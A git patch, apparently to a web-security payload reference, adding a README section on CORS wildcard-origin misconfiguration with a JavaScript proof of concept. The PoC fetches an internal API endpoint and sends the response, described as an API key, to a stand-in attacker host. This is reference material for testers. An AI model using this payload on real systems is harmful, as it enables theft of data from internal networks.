From 3e5b36722418cba19b02abd751ab08160dcb43e5 Mon Sep 17 00:00:00 2001
From: Emanuel Duss <emanuel.duss@gmail.com>
Date: Sun, 12 Apr 2020 15:06:28 +0200
Subject: [PATCH] Added CORS Exploit when wildcard origin  is allowed

---
 CORS Misconfiguration/README.md | 35 +++++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)

diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md
index d7d9f95..8d9af8b 100644
--- a/CORS Misconfiguration/README.md	
+++ b/CORS Misconfiguration/README.md	
@@ -128,6 +128,41 @@ again.
 https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
 ```
 
+### Vulnerable Example: Wildcard Origin `*` without Credentials
+
+If the server responds with a wildcard origin `*`, the browser does never send
+the cookies. Howver, if the server does not require authentication, it's still
+possible to access the data on the server. This can happen on internal servers
+that are not accessible from the Internet. The attacker's website can then
+pivot into the internal network and access the server's data withotu
+authentication.
+
+#### Vulnerable Implementation
+
+```powershell
+GET /endpoint HTTP/1.1
+Host: api.internal.example.com
+Origin: https://evil.com
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: *
+
+{"[private API key]"}
+```
+
+#### Proof of concept
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://api.internal.example.com/endpoint',true); 
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
 ## Bug Bounty reports
 
 * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)